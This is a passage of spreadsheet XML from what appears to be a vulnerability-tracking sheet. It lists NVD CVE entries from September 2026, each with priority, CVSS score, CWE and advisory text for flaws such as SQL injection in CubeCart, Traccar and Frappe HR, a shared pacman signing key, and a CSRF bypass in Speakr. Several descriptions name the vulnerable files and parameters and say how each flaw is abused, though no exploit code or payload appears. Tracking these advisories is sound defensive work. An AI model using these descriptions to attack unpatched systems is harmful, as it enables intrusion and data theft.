          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Use of Hard-coded Credentials vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Unauthorized access.</t>
        </is>
      </c>
      <c r="T214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81440</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52727</t>
        </is>
      </c>
      <c r="D215" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E215" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F215" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="inlineStr"/>
      <c r="I215" s="5" t="inlineStr"/>
      <c r="J215" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K215" s="5" t="inlineStr"/>
      <c r="L215" s="5" t="inlineStr"/>
      <c r="M215" s="5" t="inlineStr"/>
      <c r="N215" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O215" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P215" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q215" s="5" t="inlineStr"/>
      <c r="R215" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S215" s="5" t="inlineStr">
        <is>
          <t>lxc-ci contains continuous integration and image-build scripts for LXC. Prior to the 2026-05-28 Arch Linux image publication, images built from images/archlinux.yaml retain the same pacman local-signing private key in /etc/pacman.d/gnupg and redistribute it to every container or virtual machine created from that image. An attacker who controls an HTTP package mirror or can intercept mirror traffic can use the shared pacman signing private key to sign modified packages that affected clients accept as trusted. Installing those packages permits arbitrary code execution as root on the client system. This issue is fixed in Arch Linux images published on or after 2026-05-28.</t>
        </is>
      </c>
      <c r="T215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52727</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54646</t>
        </is>
      </c>
      <c r="D216" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E216" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F216" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G216" s="5" t="inlineStr"/>
      <c r="H216" s="5" t="inlineStr"/>
      <c r="I216" s="5" t="inlineStr"/>
      <c r="J216" s="5" t="inlineStr"/>
      <c r="K216" s="5" t="inlineStr"/>
      <c r="L216" s="5" t="inlineStr"/>
      <c r="M216" s="5" t="inlineStr"/>
      <c r="N216" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O216" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P216" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q216" s="5" t="inlineStr"/>
      <c r="R216" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S216" s="5" t="inlineStr">
        <is>
          <t>CubeCart is an ecommerce software solution. Prior to 6.7.5, admin/sources/maintenance.index.inc.php places administrator-controlled tablename values into ALTER TABLE, CHECK TABLE, and ANALYZE TABLE statements without validating the identifiers or escaping embedded backticks. An authenticated administrator can terminate the quoted identifier with a closing backtick and introduce attacker-controlled structural SQL, potentially compromising database confidentiality, integrity, and availability within the application's database privileges. This issue is fixed in version 6.7.5.</t>
        </is>
      </c>
      <c r="T216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54646</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54647</t>
        </is>
      </c>
      <c r="D217" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E217" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F217" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G217" s="5" t="inlineStr"/>
      <c r="H217" s="5" t="inlineStr"/>
      <c r="I217" s="5" t="inlineStr"/>
      <c r="J217" s="5" t="inlineStr"/>
      <c r="K217" s="5" t="inlineStr"/>
      <c r="L217" s="5" t="inlineStr"/>
      <c r="M217" s="5" t="inlineStr"/>
      <c r="N217" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O217" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P217" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q217" s="5" t="inlineStr"/>
      <c r="R217" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S217" s="5" t="inlineStr">
        <is>
          <t>CubeCart is an ecommerce software solution. Prior to 6.7.5, admin/sources/settings.index.inc.php directly concatenates the administrator-controlled download_expire POST parameter into a raw UPDATE statement for CubeCart_downloads without numeric validation. An authenticated administrator can supply a comma-delimited value that changes the SET clause because HTML sanitization does not neutralize SQL syntax, allowing manipulation of database columns and potentially other data within the application's database privileges. This issue is fixed in version 6.7.5.</t>
        </is>
      </c>
      <c r="T217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54647</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81445</t>
        </is>
      </c>
      <c r="D218" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E218" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F218" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G218" s="5" t="inlineStr"/>
      <c r="H218" s="5" t="inlineStr"/>
      <c r="I218" s="5" t="inlineStr"/>
      <c r="J218" s="5" t="inlineStr"/>
      <c r="K218" s="5" t="inlineStr"/>
      <c r="L218" s="5" t="inlineStr"/>
      <c r="M218" s="5" t="inlineStr"/>
      <c r="N218" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O218" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P218" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q218" s="5" t="inlineStr"/>
      <c r="R218" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S218" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains an Improper Privilege Management vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Elevation of privileges.</t>
        </is>
      </c>
      <c r="T218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81445</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81477</t>
        </is>
      </c>
      <c r="D219" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E219" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F219" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G219" s="5" t="inlineStr"/>
      <c r="H219" s="5" t="inlineStr"/>
      <c r="I219" s="5" t="inlineStr"/>
      <c r="J219" s="5" t="inlineStr"/>
      <c r="K219" s="5" t="inlineStr"/>
      <c r="L219" s="5" t="inlineStr"/>
      <c r="M219" s="5" t="inlineStr"/>
      <c r="N219" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O219" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P219" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q219" s="5" t="inlineStr"/>
      <c r="R219" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S219" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Heap-based Buffer Overflow vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Code execution.</t>
        </is>
      </c>
      <c r="T219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81477</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81480</t>
        </is>
      </c>
      <c r="D220" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E220" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F220" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G220" s="5" t="inlineStr"/>
      <c r="H220" s="5" t="inlineStr"/>
      <c r="I220" s="5" t="inlineStr"/>
      <c r="J220" s="5" t="inlineStr"/>
      <c r="K220" s="5" t="inlineStr"/>
      <c r="L220" s="5" t="inlineStr"/>
      <c r="M220" s="5" t="inlineStr"/>
      <c r="N220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O220" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P220" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q220" s="5" t="inlineStr"/>
      <c r="R220" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S220" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Stack-based Buffer Overflow vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Code execution.</t>
        </is>
      </c>
      <c r="T220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81480</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81632</t>
        </is>
      </c>
      <c r="D221" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E221" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F221" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="inlineStr"/>
      <c r="I221" s="5" t="inlineStr"/>
      <c r="J221" s="5" t="inlineStr"/>
      <c r="K221" s="5" t="inlineStr"/>
      <c r="L221" s="5" t="inlineStr"/>
      <c r="M221" s="5" t="inlineStr"/>
      <c r="N221" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O221" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P221" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q221" s="5" t="inlineStr"/>
      <c r="R221" s="5" t="inlineStr">
        <is>
          <t>CWE-598</t>
        </is>
      </c>
      <c r="S221" s="5" t="inlineStr">
        <is>
          <t>Use of HTTP Request With Sensitive Query String vulnerability in team-alembic AshAuthenticationPhoenix allows someone able to read access logs, proxy logs or browser history to recover a single-use sign-in token and authenticate as its owner.
After a successful password sign-in, AshAuthentication.Phoenix.Components.Password.SignInForm builds the sign_in_with_token path with the freshly issued user.__metadata__.token as a query parameter and redirects the browser to it with a GET. The token therefore travels in the request line, where web servers, reverse proxies, request telemetry and the browser's own history record it, all of which outlive the request and are ordinarily less protected than session storage. The redirect destination is restricted to a local path, so this is not an open redirect; the exposure is the retention of a live credential.
This issue affects ash_authentication_phoenix: from 1.7.0 before 2.17.4 and from 3.0.0-rc.0 before 3.0.0-rc.11; ash_authentication: from 3.10.5 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81632</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92919</t>
        </is>
      </c>
      <c r="D222" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E222" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F222" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="inlineStr"/>
      <c r="I222" s="5" t="inlineStr"/>
      <c r="J222" s="5" t="inlineStr"/>
      <c r="K222" s="5" t="inlineStr"/>
      <c r="L222" s="5" t="inlineStr"/>
      <c r="M222" s="5" t="inlineStr"/>
      <c r="N222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O222" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P222" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q222" s="5" t="inlineStr"/>
      <c r="R222" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S222" s="5" t="inlineStr">
        <is>
          <t>admin3 through 3.0.0 fails to sanitize client-supplied filenames in the upload handler, allowing authenticated users to write files outside the storage root on Windows deployments. Attackers can use dot-dot path segments in filenames to escape the configured storage directory and overwrite arbitrary files accessible to the server process.</t>
        </is>
      </c>
      <c r="T222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92919</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92980</t>
        </is>
      </c>
      <c r="D223" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E223" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="inlineStr"/>
      <c r="I223" s="5" t="inlineStr"/>
      <c r="J223" s="5" t="inlineStr"/>
      <c r="K223" s="5" t="inlineStr"/>
      <c r="L223" s="5" t="inlineStr"/>
      <c r="M223" s="5" t="inlineStr"/>
      <c r="N223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O223" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P223" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q223" s="5" t="inlineStr"/>
      <c r="R223" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S223" s="5" t="inlineStr">
        <is>
          <t>HortusFox-Web prior to version 6.1 contains a remote code execution vulnerability that allows authenticated administrators to execute arbitrary OS commands as the web server user by abusing the Import/Export functionality. Attackers can leverage the Import/Export feature, which is intended solely for data portability, to deploy and execute malicious code on the underlying application server host.</t>
        </is>
      </c>
      <c r="T223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92980</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C224" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-15697</t>
        </is>
      </c>
      <c r="D224" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E224" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F224" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G224" s="5" t="inlineStr"/>
      <c r="H224" s="5" t="inlineStr"/>
      <c r="I224" s="5" t="inlineStr"/>
      <c r="J224" s="5" t="inlineStr"/>
      <c r="K224" s="5" t="inlineStr"/>
      <c r="L224" s="5" t="inlineStr"/>
      <c r="M224" s="5" t="inlineStr"/>
      <c r="N224" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O224" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P224" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q224" s="5" t="inlineStr"/>
      <c r="R224" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S224" s="5" t="inlineStr">
        <is>
          <t>The Dictionary WordPress plugin through 1.0 does not escape user input before reflecting it back in the responses of several directly accessible scripts, allowing unauthenticated attackers to perform Reflected Cross-Site Scripting attacks against anyone they can induce to submit a crafted request.</t>
        </is>
      </c>
      <c r="T224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-15697</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B225" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44236</t>
        </is>
      </c>
      <c r="D225" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E225" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F225" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G225" s="5" t="inlineStr"/>
      <c r="H225" s="5" t="inlineStr"/>
      <c r="I225" s="5" t="inlineStr"/>
      <c r="J225" s="5" t="inlineStr"/>
      <c r="K225" s="5" t="inlineStr"/>
      <c r="L225" s="5" t="inlineStr"/>
      <c r="M225" s="5" t="inlineStr"/>
      <c r="N225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O225" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P225" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q225" s="5" t="inlineStr"/>
      <c r="R225" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S225" s="5" t="inlineStr">
        <is>
          <t>rabbitmq-c is a C-language AMQP client library for RabbitMQ. Prior to 0.16.0, a malicious AMQP server can send an undersized connection.tune.frame_max value during amqp_login(), and rabbitmq-c accepts the value in amqp_login_inner() in librabbitmq/amqp_socket.c. amqp_tune_connection() in librabbitmq/amqp_connection.c uses frame_max to reallocate the outbound buffer without enforcing AMQP_FRAME_MIN_SIZE. Immediate serialization of connection.tune-ok through amqp_frame_to_bytes() writes beyond the undersized heap allocation, causing memory corruption and likely denial of service. An on-path attacker can also trigger the flaw against plaintext AMQP traffic. Code execution is theoretically possible but was not demonstrated. This issue is fixed in version 0.16.0.</t>
        </is>
      </c>
      <c r="T225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44236</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B226" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52851</t>
        </is>
      </c>
      <c r="D226" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E226" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F226" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G226" s="5" t="inlineStr"/>
      <c r="H226" s="5" t="inlineStr"/>
      <c r="I226" s="5" t="inlineStr"/>
      <c r="J226" s="5" t="inlineStr"/>
      <c r="K226" s="5" t="inlineStr"/>
      <c r="L226" s="5" t="inlineStr"/>
      <c r="M226" s="5" t="inlineStr"/>
      <c r="N226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O226" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P226" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q226" s="5" t="inlineStr"/>
      <c r="R226" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S226" s="5" t="inlineStr">
        <is>
          <t>Traccar is an open source GPS tracking system. Prior to 6.14.0, an authenticated, non-readonly user with access to an object usable in a permission pair can submit DELETE /api/permissions with an extra attacker-controlled JSON key. Permission(LinkedHashMap&lt;String, Long&gt;) in src/main/java/org/traccar/model/Permission.java validates only the first two keys, but DatabaseStorage.removePermission() in src/main/java/org/traccar/storage/DatabaseStorage.java concatenates every map key into the SQL WHERE clause as a column identifier. The extra key therefore becomes attacker-controlled SQL and provides a blind boolean or error oracle that can extract arbitrary database values, including administrator email, password hashes, and salts, or conditionally delete permission rows. Unauthenticated requests are rejected. This issue is fixed in 6.14.0.</t>
        </is>
      </c>
      <c r="T226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52851</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B227" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54510</t>
        </is>
      </c>
      <c r="D227" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E227" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F227" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G227" s="5" t="inlineStr"/>
      <c r="H227" s="5" t="inlineStr"/>
      <c r="I227" s="5" t="inlineStr"/>
      <c r="J227" s="5" t="inlineStr"/>
      <c r="K227" s="5" t="inlineStr"/>
      <c r="L227" s="5" t="inlineStr"/>
      <c r="M227" s="5" t="inlineStr"/>
      <c r="N227" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O227" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P227" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q227" s="5" t="inlineStr"/>
      <c r="R227" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-352</t>
        </is>
      </c>
      <c r="S227" s="5" t="inlineStr">
        <is>
          <t>Speakr is a personal, self-hosted web application designed for transcribing audio recordings. Prior to 0.8.21-alpha, the csrf_exempt_for_api_tokens() before_request hook in src/app.py calls csrf.exempt(view_func), permanently adding the selected view to Flask-WTF's process-global exemption set. The is_token_authenticated() function in src/utils/token_auth.py calls extract_token_from_request() and treats any present token, including request.args.get('token'), as authenticated without hashing the token, querying the database, or checking validity. A network-reachable attacker can therefore send a false token to disable CSRF protection for the targeted view for the worker lifetime. Because the exemption applies to the view function across HTTP methods, a cross-origin GET to /account with a query token can poison CSRF state for a later state-changing POST without triggering CORS preflight. This browser sequence requires attacker-controlled content on a sibling subdomain under the documented cookie conditions. The bypass can modify profile data, custom prompts, transcription settings, preferences, and administrative status through routes such as admin_toggle_admin. The change_password route also skips current-password verification when current_user.password is empty, allowing the chain to set a local password on an SSO-only account and bypass SSO. This issue is fixed in version 0.8.21-alpha.</t>
        </is>
      </c>
      <c r="T227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54510</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B228" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54524</t>
        </is>
      </c>
      <c r="D228" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E228" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F228" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G228" s="5" t="inlineStr"/>
      <c r="H228" s="5" t="inlineStr"/>
      <c r="I228" s="5" t="inlineStr"/>
      <c r="J228" s="5" t="inlineStr"/>
      <c r="K228" s="5" t="inlineStr"/>
      <c r="L228" s="5" t="inlineStr"/>
      <c r="M228" s="5" t="inlineStr"/>
      <c r="N228" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O228" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P228" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q228" s="5" t="inlineStr"/>
      <c r="R228" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S228" s="5" t="inlineStr">
        <is>
          <t>Frappe HR is an open-source human resources management solution (HRMS). Prior to 16.7.0, an authenticated user with the HR User role can inject SQL through filters in the Salary Payments Based on Payment Mode report. In hrms/payroll/report/salary_payments_based_on_payment_mode/salary_payments_based_on_payment_mode.py, get_conditions constructs filter clauses from user-controlled values and get_data incorporates those clauses into a string-formatted SQL query, allowing extraction of arbitrary database data. This issue is fixed in 16.7.0.</t>
        </is>
      </c>
      <c r="T228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54524</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B229" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54608</t>
        </is>
      </c>
      <c r="D229" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E229" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F229" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G229" s="5" t="inlineStr"/>
      <c r="H229" s="5" t="inlineStr"/>
      <c r="I229" s="5" t="inlineStr"/>
      <c r="J229" s="5" t="inlineStr"/>
      <c r="K229" s="5" t="inlineStr"/>
      <c r="L229" s="5" t="inlineStr"/>
      <c r="M229" s="5" t="inlineStr"/>
      <c r="N229" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O229" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P229" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q229" s="5" t="inlineStr"/>
      <c r="R229" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-862</t>
        </is>
      </c>
      <c r="S229" s="5" t="inlineStr">
        <is>
